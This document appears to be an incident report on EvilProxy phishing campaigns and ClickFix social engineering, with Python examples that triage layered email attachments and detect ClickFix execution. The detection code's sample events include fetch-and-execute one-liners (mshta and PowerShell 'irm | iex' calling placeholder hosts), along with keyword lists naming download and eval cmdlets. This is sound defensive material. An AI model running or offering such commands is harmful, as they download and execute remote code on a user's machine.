During May, Barracuda threat analysts identified several notable email-based threats targeting organizations around the world and designed to evade detection and boost the chances of success.
# Incident Report: EvilProxy Phishing Attacks Resurface with Evasive Tactics
## Executive Summary
During May, threat analysts identified an escalated campaign built on the EvilProxy phishing-as-a-service kit, an adversary-in-the-middle reverse proxy that relays the victim to the genuine login page and captures both the credentials and the resulting session cookie. The campaigns added new evasion techniques, including layered attachments and the "ClickFix" social engineering method. Their primary goal was credential harvesting against Microsoft 365 and Upwork accounts; the hospitality-themed ClickFix lures instead coaxed the user into running attacker-supplied commands on their own machine. Response actions in the source centred on analysis and on highlighting the defensive tooling capabilities relevant to these email-based threats.
## Incident Details
- Discovery Date: May (exact dates are not given in the source)
- Incident Date: Throughout May (campaigns ongoing at the time of reporting)
- Affected Organization: Various organizations globally; no named victims
- Sector: Various (freelance/employment via Upwork spoofing, general business services, hospitality)
- Geography: Worldwide
## Timeline of Events
### Initial Access
- Date/Time: Throughout May
- Vector: Email Phishing (EvilProxy Kit)
- Details: Attacks used spoofed branding (Upwork payment notices, Microsoft 365 security warnings) and layered attachments (an Outlook .msg file whose embedded image links out) to deliver the phishing URL.
### Lateral Movement
*Not described in the source.* Credentials and session cookies captured by EvilProxy give the attacker the victim's Microsoft 365 access (mailbox, files, Teams and any application federated with the tenant) rather than internal network access as such; internal phishing from the compromised mailbox would be the typical next step, but it is not reported here. In the ClickFix attacks the goal is immediate code execution on the victim's endpoint.
### Data Exfiltration/Impact
- **Credential Theft:** Harvesting of Microsoft 365 login credentials and, through the EvilProxy reverse proxy, the authenticated session cookie.
- **Account Takeover:** Use of the stolen credentials and session to read the victim's mailbox and any data the account can reach.
- **Endpoint Compromise (ClickFix):** Delivery and execution of attacker-supplied code (e.g., an HTA file or PowerShell script) through a command the user pastes into the Windows Run dialog.
### Detection & Response
- **Detection:** Identified and analyzed by Barracuda threat analysts.
- **Response:** The source reports the new tactics for defender awareness; it gives no customer-side containment or eradication detail beyond vendor tooling capabilities.
## Attack Methodology
- **Initial Access:** Phishing emails built with the EvilProxy kit and sophisticated social engineering pretexts (Upwork payment notifications, fake M365 security alerts, invoice scams).
- **Persistence:** Not detailed for the credential harvesting phase. Captured M365 credentials, and the session cookies EvilProxy's reverse proxy captures alongside them, stay usable until the password is reset and sessions are revoked.
- **Privilege Escalation:** Not observed. Phishing yields the victim's own account privileges, and ClickFix yields command execution in the logged-on user's context; neither step escalates privilege by itself.
- **Defense Evasion:**
  * **Cloudflare Turnstile:** Placed in front of the invoice-scam phishing page as a "prove you are human" check, so URL scanners and sandboxes that cannot solve the challenge never reach the credential form and report the link as harmless.
  * **Layered Attachments:** The email carries an Outlook `.msg` attachment whose body is an image hyperlinked to the phishing site, so the URL is absent from the outer message that the email gateway scans.
  * **Varied Subject Lines:** Rotating subject lines on the fake M365 alerts so that blocking one subject does not stop the campaign.
- **Credential Access:** Fake Microsoft 365 login pages and fake Upwork verification pages that capture what the victim types.
- **Discovery:** Not detailed; the lures (payment notifications, reservation issues) suggest at most light research into the target's role or business.
- **Lateral Movement:** Implied by the stolen M365 credentials but not detailed.
- **Collection:** Credentials are the primary collected data.
- **Exfiltration:** Credentials (and session cookies, in the reverse-proxy flow) go to attacker-controlled infrastructure as the victim enters them.
- **Impact:** Account compromise and, via ClickFix, code execution on the endpoint.
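The two defense-evasion techniques above, the layered attachment and the Turnstile gate, both target the same weakness: a gateway that only looks at the outer message and only fetches the first hop. The Python below is an added example, not code from the Barracuda report or from any vendor product. It walks an email recursively to find links hidden inside attached messages and flags anchors that consist solely of an image, then classifies fetched landing-page HTML so that a Turnstile interstitial is reported as unresolved rather than clean. It models the layered attachment as a nested message/rfc822 part (the MIME form of a forwarded message) because a binary Outlook .msg is an OLE compound file that would first need a parser such as olefile; the sample email, URL and page HTML are constructed for the demo.

```python
"""Gateway-side triage for links hidden one attachment layer down.

Added example, not code from the Barracuda report. The layered attachment is
modelled as a nested message/rfc822 part rather than a binary Outlook .msg;
the sample mail, URL and page HTML below are constructed for the demo.
"""
from email import message_from_bytes
from email.message import EmailMessage
from email.policy import default
from html.parser import HTMLParser

# Strings that identify a Cloudflare Turnstile challenge page: the widget is
# loaded from Cloudflare's challenge domain and its container uses cf-turnstile.
TURNSTILE_MARKERS = ("challenges.cloudflare.com/turnstile", "cf-turnstile")


class LinkCollector(HTMLParser):
    """Collect (href, image_only) for every anchor in an HTML body.

    image_only is True when the anchor wraps an <img> and no visible text,
    the pattern used when a logo is the only thing the victim can click."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._has_text = False
        self._has_img = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self._href, self._has_text, self._has_img = attrs["href"], False, False
        elif tag == "img" and self._href is not None:
            self._has_img = True

    def handle_data(self, data):
        if self._href is not None and data.strip():
            self._has_text = True

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, self._has_img and not self._has_text))
            self._href = None


def extract_links(msg, depth=0):
    """Return (depth, href, image_only) for every link in msg, descending into
    attached messages. depth 0 is the outer mail; each attached message adds 1."""
    found = []
    ctype = msg.get_content_type()
    if ctype == "message/rfc822":
        for inner in msg.get_payload():          # payload is a list of one message
            found.extend(extract_links(inner, depth + 1))
    elif msg.is_multipart():
        for part in msg.get_payload():
            found.extend(extract_links(part, depth))
    elif ctype == "text/html":
        collector = LinkCollector()
        collector.feed(msg.get_content())
        found.extend((depth, href, img_only) for href, img_only in collector.links)
    return found


def triage_email(raw):
    """Flag links that sit inside an attached message and are reachable only
    through an image, i.e. the layered-attachment pattern."""
    msg = message_from_bytes(raw, policy=default)
    return [(d, h) for d, h, img_only in extract_links(msg) if d >= 1 and img_only]


def classify_page(html):
    """Classify fetched HTML. 'bot_gate' means the scanner has NOT seen the real
    page yet and must not report the URL as clean."""
    lowered = html.lower()
    if any(marker in lowered for marker in TURNSTILE_MARKERS):
        return "bot_gate"
    if 'type="password"' in lowered:
        return "credential_form"
    return "other"


def build_sample_email():
    """Constructed sample: a forwarded 'payment' notice whose only link is a logo."""
    inner = EmailMessage()
    inner["Subject"] = "Payment available"
    inner["From"] = "notify@example.invalid"          # assumed sender, not from the report
    inner.set_content("A payment is waiting for you.")
    inner.add_alternative(
        '<html><body><a href="https://verify.example.invalid/pay">'
        '<img src="cid:logo" alt=""></a></body></html>', subtype="html")
    outer = EmailMessage()
    outer["Subject"] = "Fwd: Payment available"
    outer["From"] = "sender@example.invalid"
    outer.set_content("Please see the attached notification.")
    outer.add_attachment(inner)                        # becomes a message/rfc822 part
    return outer.as_bytes()


# Constructed Turnstile interstitial, the page a URL scanner would stop at.
GATE_HTML = ('<html><body><div class="cf-turnstile" data-sitekey="x"></div>'
             '<script src="https://challenges.cloudflare.com/turnstile/v0/api.js">'
             '</script></body></html>')

if __name__ == "__main__":
    print(triage_email(build_sample_email()))   # [(1, 'https://verify.example.invalid/pay')]
    print(classify_page(GATE_HTML))             # bot_gate
```

The practical point is the third verdict state: a scanner that stops at the Turnstile page has seen nothing, so `bot_gate` should queue the URL for detonation in a real browser session (or hold the mail) rather than let it through, and the link at depth 1 should be scanned with the same rigour as one in the outer body.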
## Impact Assessment
- **Financial:** Not quantified in the source; likely costs are incident response, account recovery and any fraud carried out with the compromised accounts.
- **Data Breach:** User login credentials (Microsoft 365, Upwork) and, through EvilProxy's reverse proxy, authenticated session cookies; anything readable from a compromised mailbox is exposed in turn.
- **Operational:** Disruption from account lockouts and forced resets during response, or from the attacker's use of the mailbox.
- **Reputational:** Damage to trust in the spoofed platforms (Upwork, Microsoft) and in any organization whose compromised accounts are abused further.
## Indicators of Compromise
*Note: The source lists no specific domains, IPs or hashes; it is an analysis piece rather than a customer-level IOC feed. The indicators below are therefore pattern-level.*
- **Network indicators:** Phishing links that land on a Cloudflare Turnstile challenge before redirecting to an attacker-controlled credential page. (The domains and IPs were dynamic and are not reproduced here.)
- **File indicators:** Outlook `.msg` attachments whose embedded image is hyperlinked to an external URL. The source does not describe executable content inside the `.msg` itself.
- **Behavioral indicators:** A user follows a "payment verification" link, passes an intermediary bot check, and then enters credentials on a fake login page. For ClickFix, the user copies an attacker-supplied command and pastes it into the Windows Run dialog (Win+R); on the endpoint this shows up as a script host such as `powershell.exe` or `mshta.exe` spawned by `explorer.exe` with a command line that fetches remote content, and the pasted text is retained in the user's RunMRU registry key.
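The behavioural indicator for ClickFix above translates directly into an endpoint detection. The Python below is an added example, not from the Barracuda report; it runs a rule over constructed Sysmon-style process-creation events (the fields ParentImage, Image and CommandLine mirror Sysmon Event ID 1; the values, paths and URLs are made up). The rule encodes the shape of the technique: a command pasted into the Run dialog appears as a script host or living-off-the-land binary spawned by explorer.exe with a command line that fetches, decodes or hides remote content, often ending in a comment that quotes the fake CAPTCHA text.

```python
"""ClickFix execution-step detection over constructed process-creation events.

Added example; not code from the Barracuda report. The events below are made
up to mirror Sysmon Event ID 1 fields (ParentImage, Image, CommandLine).
"""
import re

# Interpreters and living-off-the-land binaries that pasted ClickFix commands invoke.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe",
}

# Command-line features; each name becomes a reason string in the alert.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "download_cmdlet": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|start-bitstransfer)\b", re.I),
    "eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded": re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden\b", re.I),
    "mshta_remote": re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I),
    # Many ClickFix one-liners end in a comment quoting the fake CAPTCHA text.
    "captcha_comment": re.compile(
        r"#\s*[\"']?\s*(i am not a robot|verification id|captcha)", re.I),
}


def basename(path):
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return the list of reasons a single event looks like ClickFix execution."""
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    reasons = []
    # The Run dialog and the File Explorer address bar both spawn children of explorer.exe.
    if basename(event.get("ParentImage", "")) == "explorer.exe":
        reasons.append("spawned_by_explorer")
    cmd = event.get("CommandLine", "")
    reasons.extend(name for name, pat in INDICATORS.items() if pat.search(cmd))
    return reasons


def is_alert(reasons):
    """Alert on an explorer.exe parent plus any indicator, or on three or more
    indicators from any parent (covers chains such as cmd.exe -> powershell.exe)."""
    indicators = [r for r in reasons if r != "spawned_by_explorer"]
    return ("spawned_by_explorer" in reasons and len(indicators) >= 1) or len(indicators) >= 3


def detect(events):
    """Run the rule over a list of event dicts; return alerts with their reasons."""
    alerts = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if is_alert(reasons):
            alerts.append({"index": i, "image": basename(ev["Image"]), "reasons": reasons})
    return alerts


# Constructed sample events; the first two are ClickFix, the rest are benign controls.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta https://example.invalid/check.hta # "I am not a robot - reCAPTCHA Verification ID: 7811"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /c powershell -w hidden -c "irm https://example.invalid/p.ps1 | iex"'},
    # User opened a PowerShell console from the Start menu: explorer parent, no fetch.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    # Scheduled inventory script under the service host: no explorer parent, no fetch.
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Scripts\inventory.ps1"},
    # Admin pulling a file from an interactive console: two indicators, not from explorer.
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "iwr https://example.invalid/tool.zip -OutFile t.zip"'},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The benign events show what the rule must not fire on: a console opened from the Start menu (explorer parent, no fetch) and a scheduled script under svchost.exe. Corroborate alerts with the pasted text retained under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, and extend the parent check to the terminal host if a variant directs victims to a PowerShell window instead of Win+R.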
## Response Actions
- **Containment:** Not specified in the source. For an affected organization the expected steps are a password reset combined with revocation of all refresh tokens and active sessions for the account (a reset alone does not invalidate a session cookie EvilProxy has already captured), a review of the mailbox for attacker-added forwarding or inbox rules and newly registered MFA methods, and isolation of any endpoint on which a ClickFix command was run.
- **Eradication:** Not specified.
- **Recovery:** Not specified.
## Lessons Learned
- Phishing-as-a-Service (PhaaS) providers like EvilProxy are rapidly innovating to defeat standard email security tools (evident in the use of Cloudflare Turnstile and layered attachments).
- ClickFix-style social engineering, now in use by both criminal and state-aligned groups, moves the execution step onto the victim: the user runs the attacker's command by hand, so there is no malicious attachment or download for the gateway to inspect.
- Attackers are diversifying pretext across multiple high-trust scenarios (employment payments, system security alerts, invoice processing).
## Recommendations
- Implement email protection that follows links to their destination, including redirect chains and bot-verification interstitials such as Cloudflare Turnstile, and that inspects the contents of nested attachments (such as `.msg` files) rather than only the outer message.
- Update security awareness training to cover ClickFix specifically: a legitimate site never asks a user to paste a command into the Run dialog or a terminal to "fix" or "verify" something. Where business needs allow, disable the Run dialog by policy (the Explorer `NoRun` policy) and alert on script hosts launched from `explorer.exe`.
- Require phishing-resistant MFA (FIDO2/WebAuthn security keys or passkeys) on Microsoft 365 and other critical accounts. Push, SMS and one-time-code factors do not stop EvilProxy, because the reverse proxy relays the MFA prompt and captures the authenticated session cookie; conditional access policies that require a compliant or managed device further limit what a stolen cookie can do.
- Investigate and block any malicious domains or IPs identified in the phishing infrastructure, and hunt for sign-ins from that infrastructure in the Microsoft 365 sign-in logs.